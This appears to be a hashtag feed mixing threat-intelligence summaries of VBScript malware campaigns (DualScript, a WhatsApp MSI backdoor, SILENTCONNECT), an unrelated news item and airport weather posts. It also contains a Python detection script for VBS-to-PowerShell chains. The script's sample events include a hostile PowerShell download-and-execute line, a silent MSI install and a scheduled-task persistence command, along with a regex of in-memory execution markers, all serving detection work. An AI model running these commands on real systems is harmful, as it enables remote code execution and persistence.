WhatsApp malware campaign delivers VBScript and MSI backdoors

Pulse ID: 69cca0d42a45dcf14f2ec56a
Pulse Link: https://otx.alienvault.com/pulse/69cca0d42a45dcf14f2ec56a
Pulse Author: Tr1sa111
Created: 2026-04-01 04:36:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #VBS #WhatsApp #bot #Tr1sa111

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Operation DualScript: Multi-Stage PowerShell Malware Targets Crypto

Operation DualScript is a sophisticated multi-stage malware campaign targeting cryptocurrency and financial activities. It utilizes Windows Scheduled Tasks, VBScript launchers, and PowerShell execution to maintain persistence while minimizing disk artifacts. The attack operates through two parallel chains: a web-based PowerShell loader deploying a cryptocurrency clipboard hijacker, and a secondary chain executing the RetroRAT implant in memory. RetroRAT monitors user activity, captures keystrokes, and tracks interactions with financial services to harvest sensitive information. The malware employs various anti-analysis techniques and establishes a command-and-control channel for remote access and data exfiltration. This campaign highlights the growing abuse of trusted system utilities and in-memory execution techniques to evade traditional detection mechanisms.

Pulse ID: 69cb7349f3c70800ebef7310
Pulse Link: https://otx.alienvault.com/pulse/69cb7349f3c70800ebef7310
Pulse Author: AlienVault
Created: 2026-03-31 07:10:01

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Clipboard #CyberSecurity #InfoSec #Malware #Nim #OTX #OpenThreatExchange #PowerShell #RAT #Rust #SMS #VBS #Windows #bot #cryptocurrency #AlienVault


WhatsApp malware campaign delivers VBScript and MSI backdoors

A sophisticated malware campaign targeting WhatsApp users has been observed since February 2026. The attack chain begins with malicious Visual Basic Script files sent via WhatsApp messages, which, when executed, initiate a multi-stage infection process. The malware uses renamed Windows utilities, retrieves payloads from trusted cloud services, and installs malicious MSI packages. The campaign employs social engineering, stealth techniques, and cloud-based payload hosting to establish persistence and escalate privileges on victim systems. The attackers utilize legitimate tools and trusted platforms to reduce visibility and increase the likelihood of successful execution. The final stage involves the delivery of unsigned MSI installers that enable remote access to compromised systems.

Pulse ID: 69cbf7d8bafcc9a4dafa7cb2
Pulse Link: https://otx.alienvault.com/pulse/69cbf7d8bafcc9a4dafa7cb2
Pulse Author: AlienVault
Created: 2026-03-31 16:35:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Cloud #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #Rust #SocialEngineering #VBS #WhatsApp #Windows #bot #AlienVault

Swiss Army buys pistol despite poor test rating

The army wants to procure a pistol from the US company SIG Sauer, even though it performs very poorly in tests.

Schweizer Radio und Fernsehen (SRF)

Tracing a Multi-Vector Malware Campaign: From VBS to Open Infrastructure

Pulse ID: 69c30b0b082da4224d114e3d
Pulse Link: https://otx.alienvault.com/pulse/69c30b0b082da4224d114e3d
Pulse Author: Tr1sa111
Created: 2026-03-24 22:07:07

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #VBS #bot #Tr1sa111


Tracing a Multi-Vector Malware Campaign: From VBS to Open Infrastructure

A multi-stage malware delivery campaign was uncovered, initially detected through a suspicious VBS file. The investigation revealed a complex attack infrastructure using Unicode obfuscation, PNG-based payload staging, and reflectively loaded .NET execution. The attacker utilized open directories to host multiple obfuscated VBS files, each mapping to different malware payloads including XWorm and Remcos RAT. A secondary infection vector involving a weaponized 'PDF' and batch script was also discovered. The campaign demonstrated a modular approach, allowing for payload rotation and multiple attack vectors from the same domain. This sophisticated infrastructure design enables rapid modification and expansion of available payloads without altering the initial delivery mechanism.

Pulse ID: 69c2502fe450207e3f4855c3
Pulse Link: https://otx.alienvault.com/pulse/69c2502fe450207e3f4855c3
Pulse Author: AlienVault
Created: 2026-03-24 08:49:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #NET #OTX #OpenThreatExchange #PDF #RAT #Remcos #RemcosRAT #VBS #Worm #XWorm #bot #AlienVault


From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect

A newly discovered loader called SILENTCONNECT is being used in active campaigns to silently install ScreenConnect, a remote monitoring and management tool, on victim machines. The infection chain begins with users being redirected to a Cloudflare Turnstile CAPTCHA page disguised as a digital invitation. Upon clicking, a VBScript file is downloaded, which retrieves and executes C# source code in memory using PowerShell. SILENTCONNECT employs various evasion techniques, including PEB masquerading and UAC bypass. The campaigns leverage trusted hosting providers like Google Drive and Cloudflare, and abuse living-off-the-land binaries. The loader has been active since March 2025 and poses a significant threat due to its stealthy nature and effectiveness.

Pulse ID: 69bbd761dff7b64814123d3f
Pulse Link: https://otx.alienvault.com/pulse/69bbd761dff7b64814123d3f
Pulse Author: AlienVault
Created: 2026-03-19 11:00:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CAPTCHA #Cloud #CyberSecurity #Google #InfoSec #Mac #OTX #OpenThreatExchange #PowerShell #RCE #Rust #ScreenConnect #VBS #bot #AlienVault

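The four pulses above (Operation DualScript, the WhatsApp VBS/MSI campaign, the open-directory VBS campaign and SILENTCONNECT) describe the same chain shape: a script host (wscript/cscript) launching PowerShell, download-and-execute or in-memory primitives on the PowerShell command line, MSI packages pulled from user-writable paths or cloud URLs, scheduled tasks whose action is a VBS launcher, and renamed Windows utilities. The following is an added hunting example, not code from any of the pulses, their authors or LevelBlue: it scores constructed Sysmon Event ID 1 style process-creation records against those shapes. Field names follow Sysmon (Image, ParentImage, CommandLine, OriginalFileName); the sample records, the paths in them and the example.invalid URL are constructed, and the rule names are this example's own.

```python
"""Hunt for VBS -> PowerShell / MSI / scheduled-task chains in process-creation telemetry.

Records mimic Sysmon Event ID 1 fields. All sample data below is constructed (not real telemetry).
"""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line markers for download-and-execute or in-memory execution in PowerShell.
INMEM_MARKERS = re.compile(
    r"(?i)(\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Add-Type|"
    r"FromBase64String|-EncodedCommand\b|-enc\b)"
)
# Paths a standard user can write to; MSI packages normally install from vendor media or admin shares.
USER_WRITABLE = re.compile(r"(?i)\\(AppData|Temp|Downloads|ProgramData|Users\\Public)\\")
URL = re.compile(r"(?i)https?://")

# Constructed sample events. example.invalid is a reserved, never-resolving test domain.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\invite.vbs"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "IEX (New-Object Net.WebClient)'
                    '.DownloadString(\'https://example.invalid/s.ps1\')"'},
    {"Image": r"C:\Users\u\AppData\Local\Temp\upd.exe", "OriginalFileName": "msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\Users\u\AppData\Local\Temp\upd.exe /i C:\Users\u\AppData\Local\Temp\setup.msi /qn"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks.exe /Create /SC MINUTE /MO 5 /TN Updater /TR "wscript.exe C:\ProgramData\run.vbs"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]


def _name(path: str) -> str:
    """Lower-cased basename of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of the rules one event trips, in rule order (empty list = clean)."""
    image = _name(event["Image"])
    parent = _name(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    original = event.get("OriginalFileName", "").lower()
    hits = []
    # Script host launching PowerShell: the pivot step in every pulse above.
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    # PowerShell pulling or evaluating code rather than running a script from disk.
    if image in POWERSHELL and INMEM_MARKERS.search(cmd):
        hits.append("powershell_inmemory_or_download")
    # A renamed copy of a signed Windows utility keeps its PE OriginalFileName.
    if original and original != image:
        hits.append("renamed_windows_utility")
    # msiexec (by name or by OriginalFileName) installing a package from a user path or URL.
    if "msiexec.exe" in (image, original) and re.search(r"(?i)\.msi\b", cmd) \
            and (USER_WRITABLE.search(cmd) or URL.search(cmd)):
        hits.append("msi_from_user_writable_or_url")
    # Persistence: a scheduled task whose action is a VBS launcher.
    if image == "schtasks.exe" and re.search(r"(?i)/create\b", cmd) \
            and re.search(r"(?i)(wscript|cscript|\.vbs\b)", cmd):
        hits.append("scheduled_task_vbs_launcher")
    return hits


def scan(events) -> dict[int, list[str]]:
    """Map event index -> rule hits, keeping only events that tripped at least one rule."""
    return {i: h for i, e in enumerate(events) if (h := evaluate(e))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["Image"], hits)
```

A bare wscript launch (event 0) is deliberately not flagged; it is the child process, the command-line markers and the OriginalFileName mismatch that carry the signal. The OriginalFileName check will also fire on legitimately renamed binaries (some vendor updaters ship renamed copies of Windows tools), so treat it as a triage signal to be correlated with the other rules rather than an alert on its own.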
Aviation weather for Brescia airport in Montichiari area (Italy) is "LIPO 151150Z AUTO 03013KT 9999 FEW074/// BKN091/// 14/07 Q1008" : See what it means on https://www.bigorre.org/aero/meteo/lipo/en #bresciaairport #airport #montichiari #italy #lipo #vbs #metar #aviation #aviationweather #avgeek vl
Brescia airport in Montichiari (Italy) aviation weather and informations LIPO VBS

Aviation weather with TAF and METAR, Maps, hotels and aeronautical information for Brescia airport in Montichiari (Italy)

Bigorre.org
Aviation weather for Brescia airport in Montichiari area (Italy) is "LIPO 041020Z AUTO 14003KT 100V180 5000 BR FEW008/// 13/10 Q1028" : See what it means on https://www.bigorre.org/aero/meteo/lipo/en #bresciaairport #airport #montichiari #italy #lipo #vbs #metar #aviation #aviationweather #avgeek vl